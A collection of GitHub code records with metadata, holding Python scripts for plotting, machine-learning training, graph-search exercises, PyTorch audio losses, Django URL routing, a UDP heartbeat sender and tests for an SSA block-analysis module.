\".mp4\")\n\ndownload()\n","repo_name":"copyPasteNinja/Python","sub_path":"Learning/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34005104016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 8 11:44:58 2019\n\n@author: Jialong Jiang\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport scipy.io as sio\nimport numpy as np\nimport matplotlib as mpb\nimport matplotlib.gridspec as gridspec\nfrom plot_network import plot_network, move_axis\n\nmpb.rcParams.update({'font.size': 14})\nmpb.rcParams.update({'axes.labelsize': 16})\nmpb.rcParams.update({'axes.titlesize': 16})\nmpb.rcParams.update({'figure.dpi': 300})\n\nmdata = sio.loadmat('fig2_data')\nlocals().update(mdata)\nj_mat = - j_mat\nexter_h = - exter_h\ncur_j0 = - cur_j0\ncur_j1 = - cur_j1\ncur_j2 = - cur_j2\n\n\nfigw = 17.8 / 2.54 * 2\nfigh = 17.8 / 20 / 2.54 * 13 * 2\nfig = plt.figure(figsize=[figw, figh])\ngs = gridspec.GridSpec(2, 3, width_ratios=[1, 1, 1], height_ratios=[1, 1], \n left=0.08, right=0.9, top=0.94, bottom=0.1, \n wspace=0.25, hspace=0.25)\n\n\nax1 = plt.subplot(gs[0])\nax2 = plt.subplot(gs[1])\nax2pos = ax2.get_position()\n# ax3 = plt.subplot(gs[2])\nax4 = plt.subplot(gs[3])\nax4pos = ax4.get_position()\nax5 = plt.subplot(gs[4])\n# ax6 = plt.subplot(gs[5])\n\ndef process_axis(ax):\n ax.set_aspect('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n \nleftpos = ax2pos.x1 + 0.07\nrightpos = 0.94\n\ngs2 = gridspec.GridSpec(2, 2, left=leftpos, right=rightpos, \n top=ax4pos.y1, bottom=ax4pos.y0, \n wspace=0.15, hspace=0.05) \nax61 = plt.subplot(gs2[0]) \nprocess_axis(ax61)\nax62 = plt.subplot(gs2[1]) \nprocess_axis(ax62)\nax63 = plt.subplot(gs2[2]) \nprocess_axis(ax63)\nax64 = plt.subplot(gs2[3]) \nprocess_axis(ax64)\n\ngs1 = gridspec.GridSpec(2, 2, left=leftpos, right=rightpos, \n top=ax2pos.y1, bottom=ax2pos.y0, \n wspace=0.23, hspace=0.05) \nax31 = plt.subplot(gs1[0]) \nprocess_axis(ax31)\nax32 = plt.subplot(gs1[1]) \nprocess_axis(ax32)\nax33 = plt.subplot(gs1[2]) \nprocess_axis(ax33)\nax34 = plt.subplot(gs1[3]) \nprocess_axis(ax34)\n\nmove_axis(ax1, - 0.02, 0.02)\n\nmove_axis(ax31, 0, 0.02)\nmove_axis(ax32, 0, 0.02)\nmove_axis(ax33, 0, - 0.01)\n\nmove_axis(ax63, 0, - 0.03)\nmove_axis(ax64, 0, - 0.03)\n\nim_ax3 = ax31.imshow(rec_all_corr[:, :, 0], cmap='PiYG_r', clim=[- 1, 1])\nax32.imshow(np.mean(rec_all_corr[:, :, :3], axis=2), cmap='PiYG_r', clim=[- 1, 1])\nax33.imshow(np.mean(rec_all_corr[:, :, :6], axis=2), cmap='PiYG_r', clim=[- 1, 1])\nax34.axis('off')\n\njlim = 3.3\nim_ax6 = ax64.imshow(j_mat, cmap='bwr', clim=[- jlim, jlim])\nax61.imshow(cur_j0, cmap='bwr', clim=[- jlim, jlim])\nax62.imshow(cur_j1, cmap='bwr', clim=[- jlim, jlim])\nax63.imshow(cur_j2, cmap='bwr', clim=[- jlim, jlim])\n\nnode_posi = [0, 5, 10, 15]\nnode_ind = [1, 6, 11, 16]\n\ndef add_xtick(ax_list):\n for ax in ax_list:\n ax.set_xticks(node_posi)\n ax.set_xticklabels(node_ind)\n\ndef add_ytick(ax_list):\n for ax in ax_list:\n ax.set_yticks(node_posi)\n ax.set_yticklabels(node_ind)\n\nadd_xtick([ax33, ax32, ax63, ax64]) \nadd_ytick([ax31, ax33, ax61, ax63]) \n\n# ax32.set_xlabel('Node index')\nax31.set_ylabel('Node index')\nax61.set_ylabel('Node index')\n# ax63.set_xlabel('Node index')\n\nax31.set_title('No perturbation')\nax32.set_title('2 perturbations')\nax33.set_title('5 perturbations')\n\nax64.set_title('Ground truth')\nax61.set_title('No perturbation')\nax62.set_title('2 perturbations')\nax63.set_title('5 perturbations')\n\nax6c = fig.add_axes([0.95, 0.13, 0.01, 0.25])\ncbar = fig.colorbar(im_ax6, cax=ax6c, ticks=[- 3, 0, 3])\nax6c.set_ylabel('Interaction strength', position=[0.8, 0.62], labelpad=-4)\n\nax3c = fig.add_axes([0.95, 0.63, 0.01, 0.25])\ncbar = fig.colorbar(im_ax3, cax=ax3c, ticks=[- 1, 0, 1])\nax3c.set_ylabel('Correlation', position=[0.6, 0.5], labelpad=-5)\n\n\npos = np.load('pos16.npy', allow_pickle=True).item()\nax1, pos = plot_network(ax1, j_mat, 1, 1.3, pos=pos, labeldist=0.06)\nax1.set_ylim([ - 0.771, 1.09])\nax1.set_aspect('equal')\n\nax2.semilogy(np.diag(reald) * 6)\nax2.semilogy(rec_reald[:, 1] * 2, '--')\nax2.semilogy(rec_reald[:, 4], '-.')\nax2.set_yticks([1e-10, 1e-5, 1])\nax2.set_ylim([1e-12, 1e3])\nax2.set_xticks([0, 40, 80, 120])\nax2.set_xticklabels([120, 80, 40, 0])\nax2.set_xlabel('Eigenvalue index')\nax2.set_ylabel('Eigenvalues of $\\mathcal{I}$')\nax2.yaxis.set_label_coords(- 0.18, 0.52) \n\n\nxx_cutoff = 2000\ntrain_list = np.arange(1, num_epoch, rec_gap)\nax4.plot(train_list, datf0[0][0][3], label='No perturbation')\nax4.plot(train_list, datf1[0][0][3], '--', label='2 perturbations')\nax4.plot(train_list, datf2[0][0][3], '-.', label='5 perturbations')\nax4.set_xlim([0, xx_cutoff])\nax4.set_xlabel('Steps')\n# ax4.legend(bbox_to_anchor=(1.05, 1.35))\nax4.legend(bbox_to_anchor=(2.26, 1.57))\n#ax4.set_ylabel(r'$\\ell_2$ error')\nax4.set_ylabel(r'Mean error')\n\n\n\nax5.plot(train_list, datf0[0][0][2][:, 0])\nax5.plot(train_list, datf1[0][0][2][:, 0], '--')\nax5.plot(train_list, datf2[0][0][2][:, 0], '-.')\nax5.set_xlim([0, 2000])\nax5.set_xlabel('Steps')\nax5.set_ylabel('Edge prediction')\nax5.yaxis.set_label_coords(- 0.13, 0.5) \n\n\nabcd_size = 18\n\nfxx1 = 0.04\nfxx2 = 0.34\nfxx3 = 0.63\nfyy1 = 0.97\nfyy2 = 0.49\nfig.text(fxx1, fyy1, '(a)', fontsize=abcd_size)\nfig.text(fxx1, fyy2, '(d)', fontsize=abcd_size)\nfig.text(fxx2, fyy1, '(b)', fontsize=abcd_size)\nfig.text(fxx2, fyy2, '(e)', fontsize=abcd_size)\nfig.text(fxx3, fyy1, '(c)', fontsize=abcd_size)\nfig.text(fxx3, fyy2, '(f)', fontsize=abcd_size)\n\n\nplt.savefig('fig2.pdf', bbox='tight')\n\n","repo_name":"JialongJiang/Active_learning_spin","sub_path":"Figures/Fig2/plog_fig2.py","file_name":"plog_fig2.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"31119901389","text":"# Author By Gary1111\n\nimport lightgbm as lgb\nimport pandas as pd\nfrom pandas import DataFrame\n\ntrain = pd.read_csv(\"train_XY.csv\", index_col=False)\ntest = pd.read_csv('test.csv',index_col=False)\ntest.rename(columns = {\"Unnamed: 0\" :'id'},inplace=True)\ntest['id'] = list(range(1,10001))\ntrain_x = train.drop(['id','label'],axis=1) # 得到训练特征\ntrain_y = train['label']\nprint(train_x.shape,train_y.shape)\nprint(train_x.columns)\nprint(train_y)\n\nres = DataFrame()\nres['id'] = test['id']\ntest.drop('id',axis=1,inplace=True)\n\nclf = lgb.LGBMClassifier(\n boosting_type='gbdt', num_leaves=31, reg_alpha=0.0, reg_lambda=1,\n max_depth=-1, n_estimators=500, objective='multiclass',\n subsample=0.7, colsample_bytree=0.7, subsample_freq=1,\n learning_rate=0.1, min_child_weight=25, random_state=2018, n_jobs=50\n )\nclf.fit(train_x, train_y, eval_set=[(train_x, train_y)], early_stopping_rounds=100)\nres['label'] = clf.predict(test)\nprint(res.head(5))\nres.to_csv(\"submission.csv\",index=False)","repo_name":"GaryGky/Machine-Learning","sub_path":"Kanada-Project/LightGbm.py","file_name":"LightGbm.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"10926308104","text":"\n# link: https://www.acmicpc.net/problem/1260\n# Level: S2\n# DFS, BFS 기본개념\n\ndef solution():\n import sys\n input = sys.stdin.readline\n\n node_count, edge_count, start_node = map(int, input().split())\n edge_list = [[] for _ in range(node_count + 1)]\n edge_list[0] = None\n for _ in range(edge_count):\n edge_start, edge_end = map(int, input().split())\n edge_list[edge_start].append(edge_end)\n edge_list[edge_end].append(edge_start)\n\n visited_DFS = [False] * (node_count + 1)\n visited_DFS[0] = None\n visited_DFS_seq = []\n\n def DFS(target_node):\n if visited_DFS[target_node] is True:\n return\n visited_DFS[target_node] = True\n visited_DFS_seq.append(target_node)\n for next_node in sorted(edge_list[target_node]):\n if visited_DFS[next_node] is False:\n DFS(next_node)\n DFS(start_node)\n\n visited_BFS = [False] * (node_count + 1)\n visited_BFS[0] = None\n visited_BFS_seq = []\n from collections import deque\n queue_BFS = deque()\n\n queue_BFS.append(start_node)\n while len(queue_BFS) != 0:\n target_node = queue_BFS.popleft()\n if visited_BFS[target_node] is True:\n continue\n visited_BFS[target_node] = True\n visited_BFS_seq.append(target_node)\n for next_node in sorted(edge_list[target_node]):\n if visited_BFS[next_node] is False:\n queue_BFS.append(next_node)\n\n print(*visited_DFS_seq)\n print(*visited_BFS_seq)\n\n\nif __name__ == \"__main__\":\n solution()","repo_name":"SWARTHYPEARL/Algorithm_Study","sub_path":"baekjoon/baekjoon_1260.py","file_name":"baekjoon_1260.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1059154004","text":"#PROBLEM LINK:- https://leetcode.com/problems/kids-with-the-greatest-number-of-candies/\n\nclass Solution:\n def kidsWithCandies(self, c, e):\n result = []\n for i in range(len(c)):\n if c[i]+e>=max(c):\n result.append(True)\n else:\n result.append(False)\n return result\n","repo_name":"hassanrahim26/LEETCODE","sub_path":"ARRAYS/Easy/Kids With the Greatest Number of Candies/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"35264981495","text":"import torch\n\nfrom clarity.predictor.torch_stoi import NegSTOILoss\n\n\nclass SISNRLoss(torch.nn.Module):\n # def __init__(self): # removed as does nothing\n # super(SISNRLoss, self).__init__()\n\n def cal_sisnr(self, x, s, eps=1e-8):\n \"\"\"\n Arguments:\n x: separated signal, N x S tensor\n s: reference signal, N x S tensor\n Return:\n sisnr: N tensor\n \"\"\"\n\n def l2norm(mat, keepdim=False):\n return torch.norm(mat, dim=-1, keepdim=keepdim)\n\n if x.shape != s.shape:\n raise RuntimeError(\n f\"Dimension mismatch when calculate si-snr, {x.shape} vs {s.shape}\"\n )\n x_zm = x - torch.mean(x, dim=-1, keepdim=True)\n s_zm = s - torch.mean(s, dim=-1, keepdim=True)\n t = (\n torch.sum(x_zm * s_zm, dim=-1, keepdim=True)\n * s_zm\n / (l2norm(s_zm, keepdim=True) ** 2 + eps)\n )\n return 20 * torch.log10(eps + l2norm(t) / (l2norm(x_zm - t) + eps))\n\n def forward(self, x, y):\n return -self.cal_sisnr(x, y).mean()\n\n\nclass SNRLoss(torch.nn.Module):\n def __init__(self, tao=1e-3):\n super().__init__()\n self.tao = tao\n\n def l2norm(self, mat, keepdim=False):\n return torch.norm(mat, dim=-1, keepdim=keepdim)\n\n def forward(self, x, s, eps=1e-8):\n if x.shape != s.shape:\n raise RuntimeError(\n f\"Dimension mismatch when calculate si-snr, {x.shape} vs {s.shape}\"\n )\n\n loss = 10 * torch.log10(\n self.l2norm(s - x) ** 2 + self.tao * self.l2norm(s) ** 2 + eps\n ) - 10 * torch.log10(self.l2norm(s) ** 2 + eps)\n return loss.mean()\n\n\nclass STOILoss(torch.nn.Module):\n def __init__(self, sr):\n super().__init__()\n self.NegSTOI = NegSTOILoss(sample_rate=sr)\n\n def forward(self, x, s):\n return self.NegSTOI(x, s).mean()\n\n\nclass STOILevelLoss(torch.nn.Module):\n def __init__(self, sr, alpha, block_size=0.4, overlap=0.7, gamma_a=-70):\n super().__init__()\n self.NegSTOI = NegSTOILoss(sample_rate=sr)\n self.alpha = alpha\n\n \"rms measurement\"\n self.frame_size = int(block_size * sr)\n self.frame_shift = int(block_size * sr * (1 - overlap))\n self.unfold = torch.nn.Unfold(\n (1, self.frame_size), stride=(1, self.frame_shift)\n )\n self.gamma_a = gamma_a\n\n \"mse\"\n self.cal_mse = torch.nn.MSELoss()\n\n def measure_loudness(self, signal, eps=1e-8):\n x_unfold = self.unfold(signal.unsqueeze(1).unsqueeze(2))\n\n z = (\n torch.sum(x_unfold**2, dim=1) / self.frame_size\n ) # mean square for each frame\n el = -0.691 + 10 * torch.log10(z + eps)\n\n idx_a = torch.where(el > self.gamma_a, 1, 0)\n z_ave_gated_a = torch.sum(z * idx_a, dim=1, keepdim=True) / (\n torch.sum(idx_a, dim=1, keepdim=True) + eps\n )\n gamma_r = -0.691 + 10 * torch.log10(z_ave_gated_a + eps) - 10\n\n idx_r = torch.where(el > gamma_r, 1, 0)\n idx_a_r = idx_a * idx_r\n z_ave_gated_a_r = torch.sum(z * idx_a_r, dim=1, keepdim=True) / (\n torch.sum(idx_a_r, dim=1, keepdim=True) + eps\n )\n lufs = -0.691 + 10 * torch.log10(z_ave_gated_a_r + eps) # loudness\n return lufs\n\n def forward(self, x, s):\n loudness_x = self.measure_loudness(x)\n loudness_s = self.measure_loudness(s)\n LevelLoss = self.alpha * self.cal_mse(loudness_x, loudness_s)\n return LevelLoss + self.NegSTOI(x, s).mean()\n","repo_name":"claritychallenge/clarity","sub_path":"clarity/engine/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"60"} +{"seq_id":"41301026834","text":"\"\"\"\n 给定二维空间中四点的坐标,返回四点是否可以构造一个正方形\n 一个点的坐标(x,y)由一个有两个整数的整数数组表示\n example 1:\n 输入: p1 = [0,0], p2 = [1,1], p3 = [1,0], p4 = [0,1]\n 输出: True\n\"\"\"\nfrom typing import List\n\n\n# 正方形的定义是,四边相等,对角线相等\ndef valid_square(p1: List[int], p2: List[int], p3: List[int], p4: List[int]) -> bool:\n pl = [p1, p2, p3, p4]\n dist = []\n for i in range(len(pl)):\n for j in range(i + 1, len(pl)):\n item = (pl[i][1] - pl[j][1]) ** 2 + (pl[i][0] - pl[j][0]) ** 2\n dist.append(item)\n dist.sort()\n return True if dist[0] == dist[3] != 0 and dist[4] == dist[5] else False\n\n\nif __name__ == '__main__':\n print(valid_square(p1=[0, 0], p2=[1, 1], p3=[1, 0], p4=[0, 1]))\n\n","repo_name":"zexiangzhang/algorithmAndDataStructure","sub_path":"algorithm/computational_geometry/base/valid_square.py","file_name":"valid_square.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"34188206772","text":"# Тренер секции по стрельбе получил результаты\n# выступления своих спортсменов, где каждое очко означает\n# поражённый сектор.\n# Помогите ему сымитировать по имеющимся данным\n# поражённые мишени.\n# Николай: 4, 6, 10, 4, 2, 8, 10, 7, 1, 5\n# Александр: 3, 3, 10, 5, 10, 10, 4, 3, 6, 1\n# Павел: 2, 2, 1, 1, 3, 7, 9, 9, 2, 8\n\nimport matplotlib.pyplot as plt\n\nn = [4, 6, 10, 4, 2, 8, 10, 7, 1, 5]\na = [3, 3, 10, 5, 10, 10, 4, 3, 6, 1]\np = [2, 2, 1, 1, 3, 7, 9, 9, 2, 8]\n\nmax_value = 10\n\nn_invert = list(max_value - i for i in n)\na_invert = list(max_value - i for i in a)\np_invert = list(max_value - i for i in p)\n\nax = plt.subplot(131, polar = True)\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_ticks([0, 2, 4, 6, 8, 10])\nax.get_yaxis().set_ticklabels(['10', '8', '6', '4', '2', '0'])\nplt.plot(n_invert, 'ro')\n\nax = plt.subplot(132, projection = 'polar')\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_ticks([0, 2, 4, 6, 8, 10])\nax.get_yaxis().set_ticklabels(['10', '8', '6', '4', '2', '0'])\nplt.plot(a_invert, 'go')\n\nax = plt.subplot(133, projection = 'polar')\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_ticks([0, 2, 4, 6, 8, 10])\nax.get_yaxis().set_ticklabels(['10', '8', '6', '4', '2', '0'])\nplt.plot(p_invert, 'yo')\n\nplt.show()","repo_name":"fillomaniya/Python_education","sub_path":"seminar_11/seminarWork/zadacha2.py","file_name":"zadacha2.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14227492247","text":"import tkinter as tk\r\nimport tkinter.ttk as ttk\r\n\r\nclass Window:\r\n def __init__(self,master):\r\n\r\n style = ttk.Style()\r\n style.theme_create(\"Custom\")\r\n style.theme_settings(\"Custom\", {\r\n \"TButton\": {\r\n \"configure\": {\"padding\": 10},\r\n \"map\": {\r\n \"background\": [(\"active\", \"yellow3\"),\r\n (\"!disabled\", \"yellow\")],\r\n \"foreground\": [(\"focus\", \"Red\"),\r\n (\"active\", \"green\"),\r\n (\"!disabled\", \"Blue\")]\r\n }\r\n }\r\n })\r\n\r\n style.theme_use(\"Custom\")\r\n\r\n button = ttk.Button(master, text = \"Uzspied!\")\r\n button.pack(padx = 5, pady = 5)\r\n \r\n \r\n label = ttk.Label(master, text = \"Es esmu Label\")\r\n label.pack(padx = 5, pady = 5)\r\n\r\nroot = tk.Tk()\r\nroot.geometry('200x220')\r\nwindow = Window(root)\r\nroot.mainloop()","repo_name":"Ralfs1/Klases-darbi","sub_path":"Klases darbi/6 aprilis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35491049162","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nfrom api.custom_admin import custom_admin_site, custom_admin_urls\n\nfrom api.urls import lesson_urls, project_urls, classroom_urls, user_urls, invites_urls, auth_urls\nfrom api.views import ApiRoot, BlogView\n\n\napi_patterns = patterns('',\n\n url(r'^$', ApiRoot.as_view(), name='root'),\n url(r'^blog/', BlogView.as_view(), name='blog'),\n\n url(r'^lessons', include(lesson_urls)),\n url(r'^projects', include(project_urls)),\n url(r'^classrooms', include(classroom_urls)),\n url(r'^users', include(user_urls)),\n url(r'^invites', include(invites_urls)),\n\n url(r'^auth', include(auth_urls)),\n\n url(r'^mkp', include('marketplace.urls')),\n\n url(r'^playlists', include('playlists.urls')),\n\n url(r'^projects', include('analytics.urls')),\n\n url(r'^docs/', include('rest_framework_swagger.urls')),\n)\n\nurlpatterns = patterns('',\n\n url(r'^api/v1/', include(api_patterns, namespace='api')),\n\n url(r'instructables-proxy/$', 'utils_app.views.instructables_proxy_view', name='instructables-proxy'),\n\n url(r'^admin/', include(admin.site.urls)),\n (r'^grappelli/', include('grappelli.urls')),\n\n url(r'^select2/', include('django_select2.urls')),\n\n url(r'^apiauth/', include('rest_framework_authtoken_cookie.urls', namespace='rest_framework_authtoken_cookie')),\n\n url(r'^xdomain/', include('xdomain.urls', namespace='xdomain')),\n\n #custom admin views:\n url(r'^admin/custom', include(custom_admin_urls, namespace=custom_admin_site.name)),\n # Direct link for editing the homepage Projects' ids. Data migration ensures it has id=1\n url(r'^admin/playlists/playlist/%d/' % ApiRoot.get_homepage_playlist_id(),\n RedirectView.as_view(url='/admin/playlists/playlist/%d/' % ApiRoot.get_homepage_playlist_id(),\n permanent=True), name='edit-homepage-ids'),\n)\n","repo_name":"omni360/inspiration-edu-api","sub_path":"eduapi/eduapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11772926356","text":"import socket\r\nimport multiprocessing\r\nimport time\r\n\r\n\r\ndef heartbeat(host, port, beat_period):\r\n \r\n ADDR = (host,port)\r\n \r\n sock =socket.socket(socket.AF_INET ,socket.SOCK_DGRAM)\r\n \r\n thStop = False\r\n \r\n while not thStop:\r\n \r\n sock.sendto('PyHB', ADDR)\r\n \r\n time.sleep(beat_period)\r\n","repo_name":"lanninghuanxue/learngit","sub_path":"send/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30604301106","text":"from contextlib import ExitStack\nfrom textwrap import dedent\nfrom unittest.mock import patch\n\nfrom expects import *\n\nfrom analysis.block import (\n Block, block_simplify, sa_common_subexpr, sa_const_fold, sa_copy_propagate, sa_dead_code_elim, sa_expr_simp,\n sa_mem_elim, sa_sub_assign_retrieve, sa_to_ssa, ssa_to_sa\n)\nfrom analysis.specs._stub import *\nfrom analysis.specs._utils import to_blocks\n\nwith description('Block'):\n with description('__str__'):\n with it('converts to str'):\n block = Block(instrs=[\n ('eax', '=', 1),\n ('eax', '=', '!', 1),\n ('eax', '=', '+', 'ebx', 1),\n ])\n block.call = ('somelib', 'somemethod')\n block.condition = 'tmp_0'\n expect(str(block)).to(equal(dedent('''\n eax = 0x1\n eax = ! 0x1\n eax = ebx + 0x1\n jmp to somelib!somemethod\n jmp left if tmp_0\n ''').strip()))\n\n with it('raises ValueError on unknown op arity'):\n expect(lambda: str(Block(instrs=[\n ('eax', '=', '??', 1, 1, 1),\n ]))).to(raise_error(ValueError))\n\n with description('split'):\n with it('splits block'):\n blocks = to_blocks([\n {'children': (2,)},\n {'children': (2,)},\n {'addr_sizes': {(0, 4)}, 'instrs': [\n ('eax', '=', 1), ('eax', '=', 2)\n ], 'condition': 'tmp', 'children': (3, 4)},\n {'children': ()},\n {'children': ()},\n ])\n upper_half, lower_half = blocks[2], blocks[2].split(1)\n expect(blocks[0].children).to(equal((upper_half,)))\n expect(blocks[1].children).to(equal((upper_half,)))\n expect(upper_half.addr_sizes).to(equal({(0, 4)}))\n expect(upper_half.instrs).to(equal([('eax', '=', 1)]))\n expect(upper_half.parents).to(equal({blocks[0], blocks[1]}))\n expect(upper_half.children).to(equal(()))\n expect(lower_half.addr_sizes).to(equal({(0, 4)}))\n expect(lower_half.instrs).to(equal([('eax', '=', 2)]))\n expect(lower_half.parents).to(equal(set()))\n expect(lower_half.condition).to(equal('tmp'))\n expect(lower_half.children).to(equal((blocks[3], blocks[4])))\n\n with it('splits addr_sizes'):\n blocks = to_blocks([{'addr_sizes': {(0, 4), (4, 4)}, 'instrs': []}])\n upper_half, lower_half = blocks[0], blocks[0].split(0, 4)\n expect(upper_half.addr_sizes).to(equal({(0, 4)}))\n expect(lower_half.addr_sizes).to(equal({(4, 4)}))\n\n with it('merges blocks no matter how many children the block has'):\n blocks = to_blocks([\n {'children': (2,)},\n {'children': (2,)},\n {'addr_sizes': {(0, 4)}, 'instrs': [('eax', '=', 1)], 'condition': 'tmp_1', 'children': (3, 4)},\n {'addr_sizes': {(4, 4)}, 'instrs': [('eax', '=', 2)], 'condition': 'tmp_2', 'children': (5, 6)},\n {'children': ()},\n {'children': ()},\n {'children': ()},\n ])\n upper_half, lower_half = blocks[2], blocks[3]\n upper_half.merge(lower_half)\n expect(blocks[0].children).to(equal((upper_half,)))\n expect(blocks[1].children).to(equal((upper_half,)))\n expect(upper_half.addr_sizes).to(equal({(0, 4), (4, 4)}))\n expect(upper_half.instrs).to(equal([('eax', '=', 1), ('eax', '=', 2)]))\n expect(upper_half.condition).to(equal('tmp_2'))\n expect(upper_half.parents).to(equal({blocks[0], blocks[1]}))\n expect(upper_half.children).to(equal((blocks[5], blocks[6])))\n expect(lower_half.parents).to(equal(set()))\n expect(lower_half.children).to(equal(()))\n expect(blocks[4].parents).to(equal(set()))\n\n with description('children.setter'):\n with it('only allows setting with tuples'):\n expect(lambda: setattr(Block(), 'children', [Block(), Block()])).to(raise_error(ValueError))\n\n with it('updates children & parents after setting children'):\n blocks = [Block(), Block(), Block(), Block(), Block()]\n blocks[0].children = (blocks[1], blocks[2])\n expect(blocks[0].children).to(equal((blocks[1], blocks[2])))\n expect(blocks[1].parents).to(equal({blocks[0]}))\n expect(blocks[2].parents).to(equal({blocks[0]}))\n blocks[0].children = (blocks[3], blocks[4])\n expect(blocks[0].children).to(equal((blocks[3], blocks[4])))\n expect(blocks[1].parents).to(equal(set()))\n expect(blocks[2].parents).to(equal(set()))\n expect(blocks[3].parents).to(equal({blocks[0]}))\n expect(blocks[4].parents).to(equal({blocks[0]}))\n\n\nwith description('sa_to_ssa'):\n with it('changes to ssa form'):\n expect(sa_to_ssa([\n ('eax', '=', '+', 'eax', 'ecx'),\n ('ebx', '=', 'eax'),\n ('eax', '=', 'ebx'),\n ])).to(equal(([\n ('eax_1', '=', '+', 'eax_0', 'ecx_0'),\n ('ebx_1', '=', 'eax_1'),\n ('eax_2', '=', 'ebx_1'),\n ], {'eax': 'eax_2', 'ebx': 'ebx_1', 'ecx': 'ecx_0'})))\n\n with it('works with subwords'):\n expect(sa_to_ssa([\n ('al', 'x=', 'eax'),\n ])).to(equal(([\n ('al_1', 'x=', 'eax_0'),\n ], {'al': 'al_1', 'eax': 'eax_0'})))\n\n with it('recounts all names'):\n expect(sa_to_ssa([\n ('tmp_3', '=', 'tmp_2'),\n ('tmp', '=', 'tmp_3'),\n ])).to(equal(([\n ('tmp_1', '=', 'tmp_0'),\n ('tmp_2', '=', 'tmp_1'),\n ], {'tmp': 'tmp_2', 'tmp_2': 'tmp_0', 'tmp_3': 'tmp_1'})))\n\nwith description('ssa_to_sa'):\n with it('recounts & remove counters from initial & final registers'):\n expect(ssa_to_sa([\n ('eax_2', '=', '+', 'eax_1', 'ecx_1'),\n ('ebx_1', '[]=', 'eax_2'),\n ('ebx_2', '=', 'eax_2'),\n ('eax_3', '=', 'ebx_2'),\n ])).to(equal(([\n ('eax_1', '=', '+', 'eax', 'ecx'),\n ('ebx', '[]=', 'eax_1'),\n ('ebx', '=', 'eax_1'),\n ('eax', '=', 'ebx'),\n ], {'eax_1': 'eax', 'eax_2': 'eax_1', 'eax_3': 'eax', 'ebx_1': 'ebx', 'ebx_2': 'ebx', 'ecx_1': 'ecx'})))\n\n with it('ignores registers which are not modified'):\n expect(ssa_to_sa([\n ('eax_1', '=', 'eax_0'),\n ])[0]).to(equal(([])))\n\nwith description('sa_expr_simp'):\n with it('simplifies xor same register to 0'):\n expect(sa_expr_simp([\n ('r2', '=', '^', 'r1', 'r1'),\n ])).to(equal([\n ('r2', '=', 0),\n ]))\n\n with it('simplify expressions involving `r1 ^ r2`'):\n expect(sa_expr_simp([\n ('r3', '=', '^', 'r1', 'r2'),\n ('r4', '=', '^', 'r3', 'r1'),\n ])).to(equal([\n ('r3', '=', '^', 'r1', 'r2'),\n ('r4', '=', 'r2'),\n ]))\n\n with it('simplify expressions involving `r1 - r1`'):\n expect(sa_expr_simp([\n ('r2', '=', '-', 'r1', 'r1'),\n ])).to(equal([\n ('r2', '=', 0),\n ]))\n\n with it('simplify expressions involving `r1 + 1`, `r1 - 1`'):\n expect(sa_expr_simp([\n ('r2', '=', '+', 'r1', 1),\n ('r3', '=', '+', 'r2', 1),\n ('r4', '=', '-', 'r3', 3),\n ('r5', '=', '+', 'r4', 1),\n ])).to(equal([\n ('r2', '=', '+', 'r1', 1),\n ('r3', '=', '+', 'r1', 2),\n ('r4', '=', '-', 'r1', 1),\n ('r5', '=', 'r1'),\n ]))\n\nwith description('sa_mem_elim'):\n with description('read'):\n with it('simplifies for constant addresses'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n (4, '[4]=', 2),\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 4),\n ])).to(equal([\n (0, '[4]=', 1),\n (4, '[4]=', 2),\n ('r1', '=', 1),\n ('r2', '=', 2),\n ]))\n\n with it('simplifies for register + constant'):\n expect(sa_mem_elim([\n ('s2', '=', '+', 's1', 4),\n ('s3', '=', '-', 's1', 4),\n ('s1', '[4]=', 1),\n ('s2', '[4]=', 2),\n ('s3', '[4]=', 3),\n ('r1', '=[4]', 's1'),\n ('r2', '=[4]', 's2'),\n ('r3', '=[4]', 's3'),\n ])).to(equal([\n ('s2', '=', '+', 's1', 4),\n ('s3', '=', '-', 's1', 4),\n ('s1', '[4]=', 1),\n ('s2', '[4]=', 2),\n ('s3', '[4]=', 3),\n ('r1', '=', 1),\n ('r2', '=', 2),\n ('r3', '=', 3),\n ]))\n\n with it('simplifies re-reads even for overlaps'):\n expect(sa_mem_elim([\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 2),\n ('r3', '=[4]', 0),\n ('r4', '=[4]', 2),\n ])).to(equal([\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 2),\n ('r3', '=', 'r1'),\n ('r4', '=', 'r2'),\n 